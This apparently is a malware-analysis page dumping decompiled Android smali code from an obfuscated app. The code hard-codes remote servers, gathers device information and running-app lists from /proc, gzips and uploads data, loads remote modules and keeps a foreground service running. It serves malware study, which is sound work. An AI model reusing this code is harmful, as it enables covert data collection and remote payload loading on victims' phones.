46new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
48const-string v1, "https://alluorine.info"
50invoke-direct/range {v0 .. v5}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
52invoke-interface {v6, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
54sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
56invoke-interface {v0, v4}, Ljava/util/List;->get(I)Ljava/lang/Object;
57move-result-object v0
58check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
59iput-boolean v5, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
61sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
63invoke-interface {v0, v4}, Ljava/util/List;->get(I)Ljava/lang/Object;
64move-result-object v0
65check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
67invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
68move-result-wide v1
69iput-wide v1, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
71iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
73sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
75invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ(Ljava/util/List;)V
76cond_6a:
77sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
79invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
80move-result v0
81if-eqz v0, :cond_8a
82new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
84const-string v2, "https://mancortz.info"
86invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
87move-result-wide v3
88move v6, v5
90invoke-direct/range {v1 .. v6}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
92sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
94invoke-interface {v0, v1}, Ljava/util/List;->add(Ljava/lang/Object;)Z
96iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
98sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
100invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct(Ljava/util/List;)V
101cond_8a: return-void
Cross References
APIs
  • org.json.JSONObject.<init>
  • java.util.Map.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getKey
  • java.lang.String.valueOf
  • java.util.Map$Entry.getValue
  • org.json.JSONObject.put
  • org.json.JSONException.printStackTrace
  • android.content.SharedPreferences.edit
  • org.json.JSONObject.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.apply
Strings
  • wbhugwreo
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONObject;
2invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
4invoke-interface {p1}, Ljava/util/Map;->entrySet()Ljava/util/Set;
5move-result-object v0
7invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
8move-result-object v2
9goto_d:
10invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
11move-result v0
12if-eqz v0, :cond_34
14invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
15move-result-object v0
16check-cast v0, Ljava/util/Map$Entry;
17try_start_19:
18invoke-interface {v0}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
19move-result-object v3
21invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
22move-result-object v3
24invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
25move-result-object v0
26check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
28invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->Odjrct()Lorg/json/JSONObject;
29move-result-object v0
31invoke-virtual {v1, v3, v0}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
32try_end_2e: goto/16 :goto_d
33catch_2f: move-exception v0
35invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
36goto/16 :goto_d
37cond_34:
38iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
40invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
41move-result-object v0
43const-string v2, "wbhugwreo"
45invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
46move-result-object v1
48invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
49move-result-object v0
51invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->apply()V
52return-void
Cross References
APIs
  • java.io.ByteArrayOutputStream.<init>
  • java.io.ByteArrayOutputStream.write
  • java.io.ByteArrayOutputStream.size
  • java.net.URLConnection.setRequestProperty
  • java.net.URLConnection.getOutputStream
  • java.io.ByteArrayOutputStream.toByteArray
  • java.io.OutputStream.write
  • java.io.OutputStream.close
  • java.net.URLConnection.getOutputStream
  • java.io.ByteArrayOutputStream.toByteArray
  • java.io.OutputStream.write
  • java.io.OutputStream.close
Strings
  • Content-Encoding
  • gzip
Position Instruction Meta Information
0new-instance v0, Ljava/io/ByteArrayOutputStream;
2invoke-direct {v0}, Ljava/io/ByteArrayOutputStream;-><init>()V
4invoke-virtual {v0, p1}, Ljava/io/ByteArrayOutputStream;->write([B)V
5const/4 v1, 0x0
6try_start_9:
7invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->size()I
8move-result v2
9sget v3, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ:I
10if-le v2, v3, :cond_2d
12const-string v2, "Content-Encoding"
14const-string v3, "gzip"
16invoke-virtual {p0, v2, v3}, Ljava/net/URLConnection;->setRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
18invoke-virtual {p0}, Ljava/net/URLConnection;->getOutputStream()Ljava/io/OutputStream;
19move-result-object v1
21invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/io/ByteArrayOutputStream;)Ljava/io/ByteArrayOutputStream;
22move-result-object v0
24invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
25move-result-object v0
27invoke-virtual {v1, v0}, Ljava/io/OutputStream;->write([B)V
28try_end_27: if-eqz v1, :cond_2c
30invoke-virtual {v1}, Ljava/io/OutputStream;->close()V
31cond_2c: return-void
32try_start_2d:
33invoke-virtual {p0}, Ljava/net/URLConnection;->getOutputStream()Ljava/io/OutputStream;
34move-result-object v1
36invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
37move-result-object v0
39invoke-virtual {v1, v0}, Ljava/io/OutputStream;->write([B)V
40try_end_38: goto/16 :goto_27
41catchall_39: move-exception v0
42if-eqz v1, :cond_3f
44invoke-virtual {v1}, Ljava/io/OutputStream;->close()V
45cond_3f: throw v0
APIs
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.put
  • android.content.SharedPreferences.edit
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • org.json.JSONObject.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.apply
  • java.lang.Integer.valueOf
  • java.util.List.add
  • org.json.JSONException.printStackTrace
Strings
  • rpwehwcnh4hbsd
Position Instruction Meta Information
0check-cast p1, Lcom/czybg/eqtbdmzpklrgyns/Module;
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
3const/4 v1, 0x0
4iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->uKFQsLn:Z
5try_start_7:
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
8invoke-virtual {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/Module;)V
10iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
12iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
14iget-object v2, p1, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
15iget v2, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
17invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
18move-result-object v2
20invoke-virtual {v1, v2, p1}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
22iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
23try_start_1d:
24iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
26invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
27move-result-object v1
28new-instance v2, Ljava/lang/StringBuilder;
30const-string v3, "rpwehwcnh4hbsd"
32invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
34iget-object v3, p1, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
35iget v3, v3, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
37invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
38move-result-object v2
40invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
41move-result-object v2
43invoke-virtual {p1}, Lcom/czybg/eqtbdmzpklrgyns/Module;->toJson()Lorg/json/JSONObject;
44move-result-object v3
46invoke-virtual {v3}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
47move-result-object v3
49invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
50move-result-object v1
52invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->apply()V
54invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->LmcGi()Ljava/util/List;
55move-result-object v1
57iget-object v2, p1, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
58iget v2, v2, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
60invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
61move-result-object v2
63invoke-interface {v1, v2}, Ljava/util/List;->add(Ljava/lang/Object;)Z
65invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Ljava/util/List;)V
66try_end_57:
67iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
68iget v1, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->DiXsQ:I
70invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;I)V
71goto_5e: return-void
72catch_5f: move-exception v0
74invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
75try_end_63: goto/16 :goto_57
76catch_64: move-exception v0
78iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
79iget v1, p0, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;->DiXsQ:I
80new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
81const-wide/16 v3, 0x3c
83invoke-direct {v2, v3, v4}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;-><init>(J)V
85invoke-static {v0, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;ILcom/czybg/eqtbdmzpklrgyns/phHwgb;)V
86goto/16 :goto_5e
Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
  • java.util.ArrayList.isEmpty
  • org.json.JSONArray.<init>
  • java.util.ArrayList.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • android.content.Context.getPackageName
  • java.lang.String.equals
  • org.json.JSONArray.put
  • org.json.JSONObject.put
Strings
  • DeviceInfo
  • RunningApps
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONObject;
2invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
3try_start_5: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
5invoke-virtual {p1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->xnLvoQ()Ljava/lang/String;
6move-result-object v2
8invoke-virtual {p1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
9move-result-object v3
11invoke-direct {v0, p0, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
13invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
14move-result-object v0
16invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct()Lorg/json/JSONObject;
17move-result-object v2
18sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
19const/16 v3, 0x14
20if-gt v0, v3, :cond_55
22invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->DiXsQ(Landroid/content/Context;)Ljava/util/ArrayList;
23move-result-object v0
24goto_24:
25const-string v3, "DeviceInfo"
27invoke-virtual {v1, v3, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
29invoke-virtual {v0}, Ljava/util/ArrayList;->isEmpty()Z
30move-result v2
31if-nez v2, :cond_5f
32new-instance v2, Lorg/json/JSONArray;
34invoke-direct {v2}, Lorg/json/JSONArray;-><init>()V
36invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
37move-result-object v3
38cond_38:
39invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
40move-result v0
41if-eqz v0, :cond_5a
43invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
44move-result-object v0
45check-cast v0, Ljava/lang/String;
47invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
48move-result-object v4
50invoke-virtual {v0, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
51move-result v4
52if-nez v4, :cond_38
54invoke-virtual {v2, v0}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
55goto/16 :goto_38
56catch_52: move-exception v0
57const/4 v0, 0x0
58goto_54: return-object v0
59cond_55:
60invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/pIwhYGC;->DiXsQ(Landroid/content/Context;)Ljava/util/ArrayList;
61move-result-object v0
62goto/16 :goto_24
63cond_5a:
64const-string v0, "RunningApps"
66invoke-virtual {v1, v0, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
67try_end_5f: move-object v0, v1
68goto/16 :goto_54
Cross References
APIs
  • android.content.Context.getResources
  • android.content.res.Resources.getConfiguration
  • java.util.Locale.getLanguage
  • java.util.Locale.<init>
  • java.util.Locale.getLanguage
  • java.lang.String.equals
  • android.widget.Toast.makeText
  • android.widget.Toast.show
  • android.widget.Toast.makeText
  • android.widget.Toast.show
Strings
  • ru
  • \u0417\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u043e \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439
  • Forbidden for system applications
Position Instruction Meta Information
0const/4 v3, 0x1
2invoke-virtual {p0}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
3move-result-object v0
5invoke-virtual {v0}, Landroid/content/res/Resources;->getConfiguration()Landroid/content/res/Configuration;
6move-result-object v0
8iget-object v0, v0, Landroid/content/res/Configuration;->locale:Ljava/util/Locale;
10invoke-virtual {v0}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;
11move-result-object v0
12new-instance v1, Ljava/util/Locale;
14const-string v2, "ru"
16invoke-direct {v1, v2}, Ljava/util/Locale;-><init>(Ljava/lang/String;)V
18invoke-virtual {v1}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;
19move-result-object v1
21invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
22move-result v0
23if-eqz v0, :cond_2a
25const-string v0, "\u0417\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u043e \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439"
27invoke-static {p0, v0, v3}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
28move-result-object v0
30invoke-virtual {v0}, Landroid/widget/Toast;->show()V
31goto_29: return-void
32cond_2a:
33const-string v0, "Forbidden for system applications"
35invoke-static {p0, v0, v3}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
36move-result-object v0
38invoke-virtual {v0}, Landroid/widget/Toast;->show()V
39goto/16 :goto_29
Cross References
APIs
  • java.util.ArrayList.<init>
  • java.io.File.<init>
  • java.io.File.listFiles
  • android.content.Context.getPackageManager
  • java.io.File.isDirectory
  • java.io.File.getName
  • java.lang.Integer.parseInt
  • java.lang.String.contains
  • android.content.pm.PackageManager.getLaunchIntentForPackage
  • java.util.ArrayList.add
Strings
  • /proc
  • :
Position Instruction Meta Information
0new-instance v1, Ljava/util/ArrayList;
2invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
3new-instance v0, Ljava/io/File;
5const-string v2, "/proc"
7invoke-direct {v0, v2}, Ljava/io/File;-><init>(Ljava/lang/String;)V
9invoke-virtual {v0}, Ljava/io/File;->listFiles()[Ljava/io/File;
10move-result-object v2
12invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
13move-result-object v3
14array-length v4, v2
15const/4 v0, 0x0
16goto_16: if-ge v0, v4, :cond_5b
17aget-object v5, v2, v0
19invoke-virtual {v5}, Ljava/io/File;->isDirectory()Z
20move-result v6
21if-eqz v6, :cond_58
22try_start_20:
23invoke-virtual {v5}, Ljava/io/File;->getName()Ljava/lang/String;
24move-result-object v5
26invoke-static {v5}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
27try_end_27: move-result v5
28try_start_28: new-instance v6, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;
30invoke-direct {v6, v5}, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;-><init>(I)V
31iget-boolean v5, v6, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ:Z
32if-eqz v5, :cond_58
33iget v5, v6, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->Odjrct:I
34const/16 v7, 0x3e8
35if-lt v5, v7, :cond_3d
36iget v5, v6, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->Odjrct:I
37const/16 v7, 0x270f
38if-le v5, v7, :cond_58
39cond_3d:
40iget-object v5, v6, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->LmcGi:Ljava/lang/String;
42const-string v7, ":"
44invoke-virtual {v5, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
45move-result v5
46if-nez v5, :cond_58
48invoke-virtual {v6}, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ()Ljava/lang/String;
49move-result-object v5
51invoke-virtual {v3, v5}, Landroid/content/pm/PackageManager;->getLaunchIntentForPackage(Ljava/lang/String;)Landroid/content/Intent;
52move-result-object v5
53if-eqz v5, :cond_58
55invoke-virtual {v6}, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ()Ljava/lang/String;
56move-result-object v5
58invoke-virtual {v1, v5}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
59try_end_58: add-int/lit8 v0, v0, 0x1
60goto/16 :goto_16
61cond_5b: return-object v1
62catch_5c: move-exception v5
63goto/16 :goto_58
64catch_5e: move-exception v5
65goto/16 :goto_58
66catch_60: move-exception v5
67goto/16 :goto_58
Cross References
APIs
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.getApplicationInfo
  • java.io.File.<init>
  • java.io.File.getAbsolutePath
  • java.lang.String.isEmpty
  • java.lang.String.split
  • java.lang.Integer.valueOf
  • java.lang.Integer.intValue
Strings
  • \n
Position Instruction Meta Information
0const/4 v5, 0x1
1const/4 v4, 0x0
2try_start_2: new-instance v0, Ljava/io/File;
4iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
6invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Landroid/content/Context;
7move-result-object v1
9invoke-virtual {v1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
10move-result-object v1
12iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
14invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Landroid/content/Context;
15move-result-object v2
17invoke-virtual {v2}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
18move-result-object v2
19const/4 v3, 0x0
21invoke-virtual {v1, v2, v3}, Landroid/content/pm/PackageManager;->getApplicationInfo(Ljava/lang/String;I)Landroid/content/pm/ApplicationInfo;
22move-result-object v1
24iget-object v1, v1, Landroid/content/pm/ApplicationInfo;->publicSourceDir:Ljava/lang/String;
26invoke-direct {v0, v1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
28invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
29move-result-object v0
31invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Ljava/lang/String;)Ljava/lang/String;
32move-result-object v0
33if-eqz v0, :cond_3e
35invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
36move-result v1
37if-nez v1, :cond_3e
39invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->Odjrct(Ljava/lang/String;)Lorg/json/JSONObject;
40move-result-object v0
41if-eqz v0, :cond_3e
43invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
44try_end_3b: move-result-object v0
45goto_3c: return-object v0
46catch_3d: move-exception v0
47cond_3e:
48iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
50invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Landroid/content/Context;
51move-result-object v0
53invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Landroid/content/Context;)Ljava/lang/String;
54move-result-object v0
56invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
57move-result v1
58if-nez v1, :cond_6f
60const-string v1, "\n"
62invoke-virtual {v0, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
63move-result-object v0
64aget-object v1, v0, v4
65array-length v2, v0
66if-le v2, v5, :cond_69
67aget-object v0, v0, v5
69invoke-static {v0}, Ljava/lang/Integer;->valueOf(Ljava/lang/String;)Ljava/lang/Integer;
70move-result-object v0
72invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
73move-result v2
74new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
76invoke-direct {v0, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;-><init>(Ljava/lang/String;I)V
77goto/16 :goto_3c
78cond_69: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
80invoke-direct {v0, v1, v4}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;-><init>(Ljava/lang/String;I)V
81goto/16 :goto_3c
82cond_6f:
83iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
85invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;)Ljava/lang/String;
86move-result-object v1
87new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
89invoke-direct {v0, v1, v4}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;-><init>(Ljava/lang/String;I)V
90goto/16 :goto_3c
APIs
  • android.content.SharedPreferences.edit
  • java.lang.System.currentTimeMillis
  • android.content.SharedPreferences$Editor.putLong
  • android.content.SharedPreferences$Editor.commit
  • android.app.Service.startForeground
  • android.content.Intent.<init>
  • android.app.Service.startService
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
Strings
  • frgSrvcEnbldBfr
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
3invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)Landroid/content/SharedPreferences;
4move-result-object v0
6invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
7move-result-object v0
9const-string v1, "frgSrvcEnbldBfr"
11invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
12move-result-wide v2
13const-wide/32 v4, 0x493e0
14add-long/2addr v2, v4
16invoke-interface {v0, v1, v2, v3}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;
17move-result-object v0
19invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
21iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
23invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)Landroid/app/Service;
24move-result-object v0
25if-eqz v0, :cond_46
27iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
29invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)Landroid/app/Service;
30move-result-object v0
31const/16 v1, 0xe4
33iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->DiXsQ:Landroid/content/Context;
35invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->hZyMGHgz(Landroid/content/Context;)Landroid/app/Notification;
36move-result-object v2
38invoke-virtual {v0, v1, v2}, Landroid/app/Service;->startForeground(ILandroid/app/Notification;)V
40iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
42invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)Landroid/app/Service;
43move-result-object v0
44new-instance v1, Landroid/content/Intent;
46iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->DiXsQ:Landroid/content/Context;
47const-class v3, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;
